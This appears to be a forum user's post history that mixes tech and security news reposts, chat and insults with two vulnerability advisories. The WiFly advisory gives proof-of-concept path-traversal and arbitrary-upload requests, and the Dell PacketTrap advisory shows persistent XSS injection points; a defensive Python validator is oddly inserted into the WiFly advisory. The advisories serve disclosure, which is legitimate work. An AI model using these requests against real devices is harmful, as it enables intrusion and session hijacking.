Everything posted by Kwelwild
-
Hi. I have a friend who reinstalled Windows, installed Mozilla, and when he tries to open Facebook the page shows up as if it were set to "No Style", but it isn't. I should mention that I also tried changing his browser and it does the same thing. Has anyone run into this? Does anyone know what causes it?! Thanks.
-
Many happy returns (and lots of money), Andrei!
-
http://www.youtube.com/watch?v=SFD0MPCVSBE
-
Confirmed, he is trustworthy.
-
Send me a PM with the forum too.
-
Updated Opscode, the commercial side of the open source Chef configuration management tool beloved by Google, Facebook, and IBM, has warned customers that a flaw in an unnamed third-party application has left its wiki and ticketing system pwned. "The attacker gained escalated privileges and downloaded the user database for the wiki and ticketing system," the company said in a blog post on Thursday. "The user database that was accessed contained usernames, email addresses, full names, and hashed passwords." "We believe these passwords are adequately secure (the software in question uses the PBKDF2 algorithm), but we will be forcing a password change on the ticketing and wiki systems. If you use this password on other systems, we suggest choosing a new password on those systems as well. We will also contact the affected users via email today."

The company was alerted to the attack by internal security monitoring, the attacker has been kicked out, and now a full investigation is underway using forensics the team has gathered. There's no word as to whether the police are involved. Opscode says there's "currently no evidence" that hosted data has been copied or compromised, but it recommends users who use the same username and password for hosted accounts should also change passwords. It's an embarrassing issue for a company that has become something of a cloud and datacenter darling of late, but it could happen to anyone these days and such openness is to be commended. The company promises more details as they become available.

Update: Opscode has provided more details about the hacking attack, and says that all hosted Chef data is now confirmed to be secure and untouched. "The attack happened around 1pm yesterday, and our security systems picked it up in under five minutes," Pauly Comtois, director of operations, told El Reg. "Once we were alerted that someone was running a script in the system, we pulled the plug on the box and took it offline immediately."
Overnight, two Opscode teams worked on the problem. The first set about rebuilding the wiki and ticketing system from the ground up so that normal services wouldn't be interrupted, while a second team took the original system and started gathering forensic evidence. It appears the attacker used a vulnerability in the wiki software and ran a JavaScript program from the Uniform Resource Identifier. In the short time before being spotted, the attacker was able to download some database data, but nothing too serious. While the attacker got some information, all passwords are secure from anything but a brute force attack requiring significant processing time, but Comtois said the company wants to let users know about the breach so that they could take precautions – just in case. Source: Security breach at Opscode as attackers download databases • The Register
-
Law-enforcement officials in the U.S. are expanding the use of tools routinely used by computer hackers to gather information on suspects, bringing the criminal wiretap into the cyber age. Federal agencies have largely kept quiet about these capabilities, but court documents and interviews with people involved in the programs provide new details about the hacking tools, including spyware delivered to computers and phones through email or Web links—techniques more commonly associated with attacks by criminals. People familiar with the Federal Bureau of Investigation's programs say that the use of hacking tools under court orders has grown as agents seek to keep up with suspects who use new communications technology, including some types of online chat and encryption tools. The use of such communications, which can't be wiretapped like a phone, is called "going dark" among law enforcement. A spokeswoman for the FBI declined to comment.

The FBI develops some hacking tools internally and purchases others from the private sector. With such technology, the bureau can remotely activate the microphones in phones running Google Inc.'s Android software to record conversations, one former U.S. official said. It can do the same to microphones in laptops without the user knowing, the person said. Google declined to comment. The bureau typically uses hacking in cases involving organized crime, child pornography or counterterrorism, a former U.S. official said. It is loath to use these tools when investigating hackers, out of fear the suspect will discover and publicize the technique, the person said. The FBI has been developing hacking tools for more than a decade, but rarely discloses its techniques publicly in legal cases. Earlier this year, a federal warrant application in a Texas identity-theft case sought to use software to extract files and covertly take photos using a computer's camera, according to court documents.
The judge denied the application, saying, among other things, that he wanted more information on how data collected from the computer would be minimized to remove information on innocent people. Since at least 2005, the FBI has been using "web bugs" that can gather a computer's Internet address, lists of programs running and other data, according to documents disclosed in 2011. The FBI used that type of tool in 2007 to trace a person who was eventually convicted of emailing bomb threats in Washington state, for example. The FBI "hires people who have hacking skill, and they purchase tools that are capable of doing these things," said a former official in the agency's cyber division. The tools are used when other surveillance methods won't work: "When you do, it's because you don't have any other choice," the official said. Surveillance technologies are coming under increased scrutiny after disclosures about data collection by the National Security Agency. The NSA gathers bulk data on millions of Americans, but former U.S. officials say law-enforcement hacking is targeted at very specific cases and used sparingly. Still, civil-liberties advocates say there should be clear legal guidelines to ensure hacking tools aren't misused. "People should understand that local cops are going to be hacking into surveillance targets," said Christopher Soghoian, principal technologist at the American Civil Liberties Union. "We should have a debate about that." Mr. Soghoian, who is presenting on the topic Friday at the DefCon hacking conference in Las Vegas, said information about the practice is slipping out as a small industry has emerged to sell hacking tools to law enforcement. He has found posts and resumes on social networks in which people discuss their work at private companies helping the FBI with surveillance. 
A search warrant would be required to get content such as files from a suspect's computer, said Mark Eckenwiler, a senior counsel at Perkins Coie LLP who until December was the Justice Department's primary authority on federal criminal surveillance law. Continuing surveillance would necessitate an even stricter standard, the kind used to grant wiretaps. But if the software gathers only communications-routing "metadata"—like Internet protocol addresses or the "to" and "from" lines in emails—a court order under a lower standard might suffice if the program is delivered remotely, such as through an Internet link, he said. That is because nobody is physically touching the suspect's property, he added. An official at the Justice Department said it determines what legal authority to seek for such surveillance "on a case-by-case basis." But the official added that the department's approach is exemplified by the 2007 Washington bomb-threat case, in which the government sought a warrant even though no agents touched the computer and the spyware gathered only metadata. In 2001, the FBI faced criticism from civil-liberties advocates for declining to disclose how it installed a program to record the keystrokes on the computer of mobster Nicodemo Scarfo Jr. to capture a password he was using to encrypt a document. He was eventually convicted. A group at the FBI called the Remote Operations Unit takes a leading role in the bureau's hacking efforts, according to former officials. Officers often install surveillance tools on computers remotely, using a document or link that loads software when the person clicks or views it. In some cases, the government has secretly gained physical access to suspects' machines and installed malicious software using a thumb drive, a former U.S. official said. The bureau has controls to ensure only "relevant data" are scooped up, the person said. 
A screening team goes through all of the data pulled from the hack to determine what is relevant, then hands off that material to the case team and stops working on the case. The FBI employs a number of hackers who write custom surveillance software, and also buys software from the private sector, former U.S. officials said. Italian company HackingTeam SRL opened a sales office in Annapolis, Md., more than a year ago to target North and South America. HackingTeam provides software that can extract information from phones and computers and send it back to a monitoring system. The company declined to disclose its clients or say whether any are in the U.S. U.K.-based Gamma International offers computer exploits, which take advantage of holes in software to deliver spying tools, according to people familiar with the company. Gamma has marketed "0 day exploits"—meaning that the software maker doesn't yet know about the security hole—for software including Microsoft Corp.'s Internet Explorer, those people said. Gamma, which has marketed its products in the U.S., didn't respond to requests for comment, nor did Microsoft. Source: FBI Taps Hacker Tactics to Spy on Suspects - WSJ.com
-
Hackers are using the Google Code developer site to spread malware, according to security firm Z-Scaler. Zscaler ThreatLabZ security researcher Chris Mannon, reported uncovering the scheme, warning that it is a marked development on criminals' usual attack strategy. "Malware writers are now turning to commercial file-hosting sites to peddle their wares. If these legitimate file hosts are not scanning the content they are hosting, it may force network administrators to block the service altogether. The kicker is that this time we see that Google Code seems to have swallowed the bad pill," he wrote. He said businesses using the service should adapt their security protocols accordingly to deal with the new threat. "This incident sets a precedent that no file-hosting service is beyond reproach. Blind trust of specific domains should not be tolerated from an organisational or personal perspective. So set those security privileges to kill and keep one eye open for shady files coming from even a seemingly trusted location." The professional-focused site is one of many hit by cyber criminals in recent months. Other websites that have been recently targeted include the Apple Developer and Nasdaq community forums. Both the attacks were designed to steal users' password information rather than alter them to become malware-distribution tools. Security experts have said the attack is part of a growing trend within the hacker community. FireEye regional technical lead Simon Mullis said he expects to see more similar attacks in the very near future. "We see this all of the time. In many cases we see fragments of multi-stage attacks for specific campaigns hosted across a variety of intermediate locations. Any site with user-editable content can be used to host part of the malware attack lifecycle," he said. "The key part here: if you cannot detect the initial inbound exploit, then the rest of the attack can be hidden or obfuscated using this approach. 
This technique has been used for years (see Aurora in 2009, Pingbed in 2011 and MiniDuke this year) and the traditional security model and simple discrete sandboxing has no answer for it." Source: Google Code developer site targeted by hackers - IT News from V3.co.uk
-
The Twitter account of the famous news agency Reuters was "hacked" by Syrian hackers. The Syrian Electronic Army, the prime suspect in the attack, reportedly used cartoons to show its support for Bashar al-Assad's regime. The hackers of the famous Syrian Electronic Army used seven photos when they broke into the Twitter account of one of the best-known news agencies in the world: Reuters. Moreover, the photos, actually drawings, depicted the current president of the Syrian state, Bashar al-Assad. The agency is the newest victim of the Syrian hackers; earlier victims include the accounts of the British newspaper The Guardian, the Associated Press agency and the CBS television network. Ironically or not, the Syrians also hacked the account of a very well-known satirical publication, The Onion. The microblogging network reaffirmed its position, stating that one of its main goals is securing the accounts of media organizations. The Syrian Electronic Army organization appeared two years ago, right at the start of the anti-Assad revolution. The hackers are believed to operate from Dubai and to be controlled by the Syrian government. Among the organization's successful actions is the "evaporation" of 130 billion dollars from the United States capital market, achieved by using the Associated Press agency's account to announce that President Obama had been injured in an explosion. Source: The Twitter account of the famous news agency Reuters was hacked by Syrian hackers - www.yoda.ro
-
Russia's leadership has decided to hire bloggers to counter the growing influence of the opposition on social networks. According to a source close to the presidential administration, the Russian authorities want to control, in particular, online discussions about corruption issues or nationalism. This will not mean that information will be presented in a way that would favor us, the sources nevertheless maintain. Russia's leadership excuses itself by saying that "most countries, including the United States, practice this policy". Aleksei Navalnii, the main opponent of Russian president Vladimir Putin, is a 37-year-old lawyer who became known thanks to investigations and revelations about corruption published on the Internet. The Internet is the main means of expression for Russia's opposition, and its social networks played an important role in the unprecedented wave of protest against the Moscow government that took place across the whole territory of the state in the winter of 2011-2012. Source: The Kremlin hires bloggers to counter the opposition on the Internet - www.yoda.ro
-
Bad news for all Facebook users. What will happen to their accounts shortly. Users with a Facebook account are getting bad news. The social network's management will make an important change this year. According to Bloomberg, cited by stirileprotv.ro, Facebook will introduce more ads, and these will be published automatically, directly on users' pages. These are 15-second video spots. The ads will start by themselves the moment users open Facebook. In exchange, the social network will receive between 1 and 2.5 million dollars per day for each ad, depending on how many users are targeted. Although the Bloomberg article supports the rumors about the introduction of these spots, a Facebook spokesperson refused to confirm the information, writes the Huffington Post. Bloomberg states that its sources are anonymous, because the project is not yet meant to be made public. The ads will start automatically for 15 seconds, as with those on YouTube, and this will happen 3 times a day, writes Bloomberg. Source: Bad news for all Facebook users. What will happen to their accounts shortly - www.yoda.ro
-
Description: The POC DDoSer Addon for Firefox. For more details: http://keralacyberforce.in/abusing-exploiting-and-pwning-with-firefox-add-ons/ @ajinabraham Source: Xenotix Ddoser Addon For Firefox
-
American cyber espionage will be run from Germany
Kwelwild replied to Syckchet's topic in Security news
Bullshit news. //LE: Nexas, fuck off to Isloboz.
-
Three months ago I reported one too; at first they told me to give them more details, I detailed it, then they told me they would fix it and that I would supposedly be added to the HoF, but I still haven't received an answer from them. I thought they had forgotten, but if you say you reported yours 6 months ago, I'll probably get an answer too. ON: Congratulations, keep them coming at the bug bounty!
-
Careful with sharing! Two Arad residents woke up with the police in their house. Arad police are lying in wait to catch people who share movies, music, games or software. "File sharing" programs have been very popular for years, with files being downloaded for free through them. Only this is illegal, and those who are caught risk being criminally investigated. Two Arad residents found officers of the Fraud Investigation Service in their homes, according to stirileprotv.ro. Camelia Tuduce, Arad Police spokesperson: "The officers carried out two home searches at two persons suspected that, through programs of the type, they downloaded and made available to other persons movies, music or games protected by copyright law". The police did not leave the two men's homes empty-handed. They seized three hard disks and two laptops containing movies, music, games and programs "reproduced without authorization". They also confiscated 121 CDs that did not bear the security hologram and were suspected of being pirated goods. The two Arad residents are being investigated without detention for "making available to the public via the Internet, without the consent of the rights holder, works and products bearing copyright and related rights". Source: Careful with sharing! Two Arad residents woke up with the police in their house - www.yoda.ro
-
The hackers from Isecenter are "flooding" RST.
Kwelwild replied to VaD_SuNeTe's topic in Trash bin
And I'll fuck you and the rest of the members of your rat-infested dumpster!
-
Google apologizes for deleting the Isle of Jura from its maps. The settlement, located off the west coast of Scotland, is completely missing even though its size is considerable. West of the Kintyre Peninsula, in the north of the United Kingdom of Great Britain, lies an island that... is missing from Google's maps! Even stranger is the fact that the place appears on Google Earth and in the Satellite View version of Google Maps, but disappears when switching to Maps View. Jura covers more than 250 square kilometers, has only 200 inhabitants and is known for the whisky it produces but also for its numerous "population" of deer (there are 25 times more of them than people). The "connection" between the small island and the largest island of the British Kingdom is made by a small ferryboat or by nautical "taxis". This is not Google's first gaffe of this kind. In 2011, the German port of Emden was shown as being under Dutch sovereignty, and last year Sunrise, a city in Florida, disappeared completely from the maps. Source: Google apologizes for deleting the Isle of Jura from its maps - www.yoda.ro
-
WiFly 1.0 Pro iOS - Multiple Vulnerabilities

Title:
======
WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities

Date:
=====
2013-07-15

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1011

VL-ID:
=====
1011

Common Vulnerability Scoring System:
====================================
6.3

Introduction:
=============
It is the best solution for transferring photos, songs, documents, movies and other files between computer and your mobile devices over wireless network. Simply launch application on your iOS device and scan QR code from http://wifly.me to connect your phone. Drop your files into opened page and vice versa! No cloud or internet access required - no data leaves your local network. Both your devices must have access to the same LAN or WLAN - no additional network configurations needed. Transferred documents can be opened with any supported App on your iOS device.

Capabilities:
- Multiple uploads
- Easily Drag & Drop multiple files to WiFly
- Preview pictures in the browser
- Downloading the entire folder to your computer
- Browsing files and folders directly on mobile device
- Exchange files between mobile devices
- Built in preview of images, documents, music and video files

(Copy of the Homepage: https://itunes.apple.com/us/app/wifly-pro/id641092695 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone).

Report-Timeline:
================
2013-07-15: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
Apple AppStore
Product: WiFly Pro 1.0

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A local file include and arbitrary file upload web vulnerability is detected in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone).

The vulnerabilities are located in the file upload module of the web-server (http://localhost:4885/) when processing to request via POST a manipulated filename. The injected file will be accessible via the index listing module of the application. Remote attackers can exchange the filename with a double or triple extension via POST method to bypass the upload validation and filter process. After the upload the attacker accesses the file with one extension and exchanges it with the other one to execute for example php, js, html codes. The filter in the application itself disallows renaming a file with special chars because of an input field restriction. Attackers need to request 2 different URLs. First the file as URL with a parameter of the filename inside to display, and as a second step the file will be uploaded with the manipulated filename in the POST request.

Exploitation of the vulnerability requires no user interaction but the victim iOS device needs to accept the other device connection. Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.

Vulnerable Application(s):
[+] WiFly Pro 1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] Upload

Vulnerable File(s):
[+] upload.json & add

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index Listing (http://localhost:4885/)

Proof of Concept:
=================
The local file/path include and arbitrary file upload vulnerability can be exploited by remote attackers without user interaction but the connection needs to be accepted by the target system. For demonstration or reproduce ...

Standard Request:
Content-Disposition: form-data; name="files[]"; filename="s2.png"\r\nContent-Type: image/png\r\n\r\n?PNG\r\n\n
Status: 200
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=new-image23.png&sessionid=1373658611109
Load Flags[LOAD_BYPASS_CACHE ] Content Size[118] Mime Type[application/x-unknown-content-type]

PoC: 1.1 - File/Path Include Vulnerability
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=../../[File/Path Include Vulnerability!].png&sessionid=1373658611109
POST_DATA[-----------------------------27213192708057
Content-Disposition: form-data; name="files[]"; filename="../../[File/Path Include Vulnerability!]"
Content-Type: image/png

PoC: 1.2 - Arbitrary File Upload Vulnerability
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=[Arbitrary File Upload Vulnerability!].png.gif.html.php.js&sessionid=1373658611109
POST_DATA[-----------------------------27213192708057
Content-Disposition: form-data; name="files[]"; filename="[Arbitrary File Upload Vulnerability!].png.gif.html.php.js"
Content-Type: image/png

Solution:
=========
The vulnerability can be patched by a restriction of the json upload request and url parameter. The POST request when processing to upload needs to be restricted, encoded and filtered.

Risk:
=====
The security risk of the local file/path include & arbitrary file upload vulnerability is estimated as high.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Source: WiFly 1.0 Pro iOS - Multiple Vulnerabilities
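The upload endpoint in the advisory trusts two attacker-controlled names, the `name` query parameter and the multipart `filename`, and the two PoCs abuse exactly that with `../` components and stacked extensions. As an added example written for this page (not the WiFly application's code), the following Python shows the server-side check that would have blocked both request shapes: a single allow-listed extension, no path components, a path-containment check, and agreement between the two names. The extension allow-list and the storage directory are assumptions.

```python
"""Server-side filename validation for an upload request shaped like the
WiFly /api/1/upload.json POST quoted in the advisory.

Added example for this page, not the WiFly application's code. The request
layout (the `name` query parameter plus a multipart `filename`) comes from
the advisory; ALLOWED_EXTENSIONS and UPLOAD_ROOT are assumptions."""
import posixpath
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Assumed allow-list: the media types the app says it transfers. Only one
# extension is permitted, so "x.png.gif.html.php.js" can never pass.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "mp3", "mp4", "pdf", "txt"}
UPLOAD_ROOT = "/var/wifly/uploads"  # assumed storage directory

# Stem characters: alphanumerics, space, underscore, hyphen; max 64 chars.
_SAFE_STEM = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 _-]{0,63}$")
_DISPOSITION_FILENAME = re.compile(r'filename="([^"]*)"')


def safe_upload_name(name: str) -> Optional[str]:
    """Return a canonical storage name, or None when the name is rejected.

    Rejects both patterns from the PoC: any path component ("../../x.png")
    and more than one extension ("x.png.gif.html.php.js"). Rejecting rather
    than stripping matters: a stripped "../" would silently accept traversal.
    """
    if not name or "\x00" in name:
        return None
    if "/" in name or "\\" in name or name in (".", ".."):
        return None
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem or "." in stem:
        return None  # no extension, or more than one
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS or not _SAFE_STEM.match(stem):
        return None
    return f"{stem}.{ext}"


def resolve_upload_path(name: str) -> Optional[str]:
    """Second, independent guard: the final path must stay under UPLOAD_ROOT."""
    safe = safe_upload_name(name)
    if safe is None:
        return None
    full = posixpath.normpath(posixpath.join(UPLOAD_ROOT, safe))
    if posixpath.commonpath([UPLOAD_ROOT, full]) != UPLOAD_ROOT:
        return None
    return full


def validate_upload_request(url: str, content_disposition: str) -> Optional[str]:
    """Validate one upload POST: the `name` query parameter and the multipart
    `filename` must each pass and must canonicalise to the same name, so a
    request cannot display one name and store under another."""
    url_name = parse_qs(urlsplit(url).query).get("name", [""])[0]
    match = _DISPOSITION_FILENAME.search(content_disposition)
    part_name = match.group(1) if match else ""
    canonical = safe_upload_name(url_name)
    if canonical is None or canonical != safe_upload_name(part_name):
        return None
    return resolve_upload_path(canonical)


if __name__ == "__main__":
    # Constructed requests modelled on the advisory's standard and PoC uploads.
    base = "http://192.168.2.104:4885/api/1/upload.json?id_parent=0&sessionid=1&name="
    for name in ("new-image23.png", "../../secret.png", "x.png.gif.html.php.js"):
        disp = f'form-data; name="files[]"; filename="{name}"'
        print(name, "->", validate_upload_request(base + name, disp))
```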
-
Dell PacketTrap MSP RMM 6.6.x - Multiple XSS Vulnerabilities

Title:
======
Dell PacketTrap MSP RMM 6.6.x - Multiple Persistent Web Vulnerabilities

Date:
=====
2013-07-17

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=791

VL-ID:
=====
791

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
Network Monitoring Software & Remote monitoring and management. Be the first to know. Remote network monitoring and management for the entire IT infrastructure. See all your customers network traffic, application performance, and device events, in one central view. Fast and easy anytime, anywhere access to any device. No more truck roll outs to site to fix problems. packetTrap RMM allows you to save time, improve productivity, and increase ROI. To meet the needs of your customers, packetTrap RMM offers agent and agentless based deployment architecture for ultimate flexibility. Network traffic & website surfing analysis - Deep AntiVirus Integration - Virtual Infrastructure Monitoring - VoIP Monitoring - Elaborate Scripting Engine - Network Mapping - Support for Most PSA - Custom Reports & Dashboard Gadgets - Performance Baseline Monitoring - packetTrap RMM Community - MSP Acceleration Program.

(Copy of the Vendor Homepage: http://www.packettrap.com/products/packettrap-msp/ )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the DELL PacketTrap 6.6.23938 MSP RMM Software.

Report-Timeline:
================
2013-01-24: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-02-06: Vendor Notification
2013-02-08: Vendor Response/Feedback
2013-**-**: Vendor Fix/Patch
2013-07-17: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
DELL
Product: PacketTrap MSP RMM 6.6.23938

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected in the DELL PacketTrap MSP v6.6.23938 appliance application. The bug allows remote attackers to implement/inject own malicious script code on the application side of the software (persistent).

The first persistent vulnerability is located in the add function of the reports (reports manager & scheduled reports|add) module when processing to request the vulnerable gadget_name, gadget_description, template name and device name parameters. The vulnerability allows to inject persistent script code as report when processing to add a report or device. The result is the persistent execution of script code out of the add reports preview software listing. Exploitation requires low user interaction & a low privileged appliance web application user account.

The second persistent vulnerability is located in the reports (index listing) module when processing to request the vulnerable customer name, device name & host name parameter & listing. The vulnerability allows to inject via add function persistent script code. The result is the persistent execution of script code out of the index reports software listing. Exploitation of the vulnerability requires low user interaction & a low privilege web application user account.

Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin), persistent phishing, persistent external redirects to malware or scam and (stable) persistent web context manipulation of the affected vulnerable module.

Vulnerable Section(s):
[+] Reports

Vulnerable Module(s):
[+] Report Manager
[+] Scheduled Reports

Vulnerable Parameter(s):
[+] Template Name
[+] Device Name
[+] gadget_name
[+] gadget_description
[+] Customername
[+] HostName

Affected Section(s):
[+] Add Preview Listing
[+] Software Report Listing

Proof of Concept:
=================
The persistent script code inject vulnerabilities can be exploited by low privileged group user accounts with low required user interaction. For demonstration or reproduce ...

Review: Reports > Report Manager > [Add Preview Listing & Software Report Listing]

</style></head><body><table style="width:100%"><tr><td><img src="5665fcbb3b1c4dd1bf902fe2a199ea15.png" alt="Quest" title="Quest" /></td></tr> <tr><td><h2>"><[PERSISTENT INJECTED SCRIPT CODE!]) <</h2> <p>All devices for customer '<[PERSISTENT INJECTED SCRIPT CODE!]"><[PERSISTENT INJECTED SCRIPT CODE!]'<BR>Generated: 10.12.2012 21:20</p></td> </tr><tr><td><table class="dash_frame" cellspacing="0" cellpadding="0" style="border-collapse:collapse;"><tr> <td><table class="dash_col_frame" cellspacing="0" cellpadding="0" style="border-collapse:collapse;"><tr> <td><table class="gadget_frame" cellspacing="0" cellpadding="0" style="border-collapse:collapse;"><tr> <td><table class="gadget_header" cellspacing="0" cellpadding="0" style="border-collapse:collapse;"><tr> <td><span class="gadget_name">"><[PERSISTENT INJECTED SCRIPT CODE!]) <</span><span class="gadget_description"> <br>Top 10 devices for customer '<[PERSISTENT INJECTED SCRIPT CODE!]"><[PERSISTENT INJECTED SCRIPT CODE!]'</span></td> </tr></table></td></tr><tr> <td><table class="list_gadget_body sortable" cellspacing="0" cellpadding="2" style="border-collapse:collapse;"> <tr
class="gadget_header_row"> <th class="gadget_header_cell_horiz" align="left" valign="middle"><span>Host Name</span></th><th class="gadget_header_cell_horiz" align="left" valign="middle"><span>IP Address</span></th><th class="gadget_header_cell_horiz" align="left" valign="middle"> <span title="Customer Name">Customer Name</span></th><th class="gadget_header_cell_horiz" align="right" valign="middle"><span> Ping Response Time</span></th><th class="gadget_header_cell_horiz" align="right" valign="middle"><span>Disk Free % Avg</span></th> <th class="gadget_header_cell_horiz" align="right" valign="middle"><span title="Average cpu usage of a system.">CPU % Avg</span></th> <th class="gadget_header_cell_horiz" align="right" valign="middle"><span>Physical Memory Used %</span></th><th align="right" valign="middle"> <span>Interface Traffic Total Avg</span></th></tr><tr> <td align="left" valign="middle"><span title="HOSTBUSTER [192.168.0.103]" style="color:Black;font-weight:normal;font-style:normal; text-decoration:none;">HOSTBUSTER</span></td><td align="left" valign="middle"><span title="HOSTBUSTER" style="color:Black;font-weight:normal; font-style:normal;text-decoration:none;">192.168.0.103</span></td><td align="left" valign="middle"><span style="color:Black;font-weight:normal; font-style:normal;text-decoration:none;"><[PERSISTENT INJECTED SCRIPT CODE!]"><[PERSISTENT INJECTED SCRIPT CODE!]</span></td><td align="right" valign="middle"><span class="numeric_value_0" style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">0 ms</span></td> <td align="right" valign="middle"><span style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">62%</span></td> <td align="right" valign="middle"><table cellpadding="0" cellspacing="0"><tr> <td><span class="numeric_value_0" style="color:Black;font-weight: normal;font-style:normal;text-decoration:none;">58.50%</span><span> </span></td><td><table cellspacing="0" cellpadding="1" 
style="font-size:0.75em;height:10px;width:70px;border-collapse:collapse;margin:0;padding:0;"> <tr><td class="numeric_bar_0" style="width:58%;"> </td><td class="numeric_bar_padding" style="width:42%;"> </td> </tr></table></td></tr> </table></td><td align="right" valign="middle"><table cellpadding="0" cellspacing="0"><tr> <td><span class="numeric_value_0" style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">59.80%</span><span> </span></td> <td><table cellspacing="0" cellpadding="1" style="font-size:0.75em;height:10px;width:70px;border-collapse:collapse;margin:0;padding:0;"> <tr><td class="numeric_bar_0" style="width:60%;"> </td><td class="numeric_bar_padding" style="width:40%;"> </td></tr></table></td></tr> </table></td><td align="right" valign="middle"><span style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;"> 0.15 Mbps</span></td></tr><tr> <td align="left" valign="middle"><span title="<[PERSISTENT INJECTED SCRIPT CODE!]20"><[PERSISTENT INJECTED SCRIPT CODE!] < [127.0.0.9]" style="color:Black;font-weight:normal;font-style: normal;text-decoration:none;"><[PERSISTENT INJECTED SCRIPT CODE!]%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <</span></td><td align="left" valign="middle"><span title="<[PERSISTENT INJECTED SCRIPT CODE!] 
<" style="color:Black; font-weight:normal;font-style:normal;text-decoration:none;">127.0.0.9</span></td><td align="left" valign="middle"><span style="color:Black; font-weight:normal;font-style:normal;text-decoration:none;"><[PERSISTENT INJECTED SCRIPT CODE!]</span></td><td align="right" valign="middle"><span class="numeric_value_0" style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">0 ms</span></td>
<td align="right" valign="middle"><span style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">62%</span></td>
<td align="right" valign="middle"><table cellpadding="0" cellspacing="0">
<tr><td><span class="numeric_value_0" style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">22.00%</span><span> </span></td>
<td><table cellspacing="0" cellpadding="1" style="font-size:0.75em;height:10px;width:70px;border-collapse:collapse;margin:0;padding:0;">
<tr><td class="numeric_bar_0" style="width:22%;"> </td><td class="numeric_bar_padding" style="width:78%;"> </td>
</tr></table></td></tr></table></td><td align="right" valign="middle"><table cellpadding="0" cellspacing="0">
<tr><td><span class="numeric_value_0" style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">60.41%</span><span> </span></td><td><table cellspacing="0" cellpadding="1" style="font-size:0.75em;height:10px;width:70px;border-collapse:collapse;margin:0;padding:0;">
<tr><td class="numeric_bar_0" style="width:60%;"> </td><td class="numeric_bar_padding" style="width:40%;"> </td>
</tr></table></td></tr>
</table></td><td align="right" valign="middle"><span style="color:Black;font-weight:normal;font-style:normal;text-decoration:none;">0.16 Mbps</span></td>
</tr></table></td></tr></table></td></tr></table></td></tr></table></td></tr></table></body></html>

Manually reproduce steps ...

1. Install the PacketTrap MSP RMM Software 6.x and start it up
2. Create a first account and switch to the main menu of the software dashboard
3. Go to the reports section and click on add reports
4. Inject your own script code via add in the vulnerable parameters
5. Click the next step button (down) of the add mask
6. The preview executes the code in the right listing after processing the first step. #reproduce1
7. Now, we reproduce the second issue. Save the report with the persistent injected own script code
8. Switch (after the save) to the index module of the reports or scheduled reports listing
9. The code will be executed persistent out of the main software reports module when processing to watch the customer name, device name or host name #reproduce2

Risk:
=====
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

Disclaimer:
===========
